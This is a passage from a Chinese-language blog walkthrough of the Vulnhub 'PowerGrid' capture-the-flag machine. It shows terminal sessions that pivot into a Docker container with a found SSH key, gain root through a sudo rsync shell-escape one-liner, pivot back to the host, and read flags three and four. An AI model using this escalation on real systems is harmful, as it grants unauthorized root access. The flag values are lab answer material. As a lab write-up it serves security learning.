valid_lft forever preferred_lft forever
上述得到的私钥应该是连接另一个容器,但是IP地址是多少还不知道?
p48@powergrid:/tmp$ ping -c 1 172.17.0.2
ping -c 1 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.054 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.054/0.054/0.054/0.000 ms
可知另外一个容器IP为172.17.0.2
p48@powergrid:/tmp$ ssh -i id_rsa [email protected]
ssh -i id_rsa [email protected]
Linux ef117d7a978f 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 20 00:22:30 2020 from 172.17.0.1
p48@ef117d7a978f:~$
p48@ef117d7a978f:~$ sudo -l
sudo -l
Matching Defaults entries for p48 on ef117d7a978f:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User p48 may run the following commands on ef117d7a978f:
(root) NOPASSWD: /usr/bin/rsync
p48@ef117d7a978f:~$ sudo /usr/bin/rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
<rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
# cd /root
cd /root
# ls -alh
ls -alh
total 36K
drwx------ 1 root root 4.0K May 19 2020 .
drwxr-xr-x 1 root root 4.0K May 19 2020 ..
lrwxrwxrwx 1 root root 9 May 19 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K May 19 2020 .ssh
-rw------- 1 root root 8.0K May 19 2020 .viminfo
-rw-r--r-- 1 root root 112 May 19 2020 flag3.txt
# cat flag3.txt
cat flag3.txt
009a4ddf6cbdd781c3513da0f77aa6a2
Well done for getting the third flag. Are you any good at pivoting backwards?
#
由于最开始扫描靶机端口时22号端口没有打开,这里又提示要往回找第四个flag,我们有理由怀疑靶机在docker0网卡上开放了SSH服务,往外连接试试。
# ssh [email protected]
ssh [email protected]
Linux powergrid 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 26 18:15:49 2020
root@powergrid:~# cd /root
cd /root
root@powergrid:~# ls -alh
ls -alh
total 72K
drwx------ 7 root root 4.0K May 26 2020 .
drwxr-xr-x 18 root root 4.0K May 19 2020 ..
lrwxrwxrwx 1 root root 9 May 19 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 4 root root 4.0K May 19 2020 .cache
-rwx--x--x 1 root root 85 May 20 2020 chown.sh
-rw-r--r-- 1 root root 472 May 20 2020 flag4.txt
drwx------ 5 root root 4.0K May 19 2020 .gnupg
drwxr-xr-x 3 root root 4.0K May 20 2020 .local
-rwxr-xr-x 1 root root 494 May 20 2020 malware.php
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 74 May 19 2020 .selected_editor
drwx------ 2 root root 4.0K May 19 2020 .ssh
drwxr-xr-x 2 root root 4.0K May 19 2020 .vim
-rw------- 1 root root 11K May 26 2020 .viminfo
-rw------- 1 root root 55 May 19 2020 .Xauthority
-rw-r--r-- 1 root root 1.2K May 26 2020 'ystemctl status docker'
root@powergrid:~# cat flag4.txt
cat flag4.txt
f5afaf46ede1dd5de76eac1876c60130
Congratulations. This is the fourth and final flag. Make sure to delete /var/www/html/startTime.txt to stop the attack (you will need to run chattr -i /var/www/html/startTime.txt first).
_._ _,-'""`-._
(,-.`._,'( |\`-/|
`-.-' \ )-`( , o o)
`- \`_`"'-
This CTF was created by Thomas Williams - https://security.caerdydd.wales
Please visit my blog and provide feedback - I will be glad to hear your comments.
root@powergrid:~#
标签:May,kali,PowerGrid,--,2020,Vulnhub,测试,p48,root
From: https://www.cnblogs.com/jason-huawen/p/17235661.html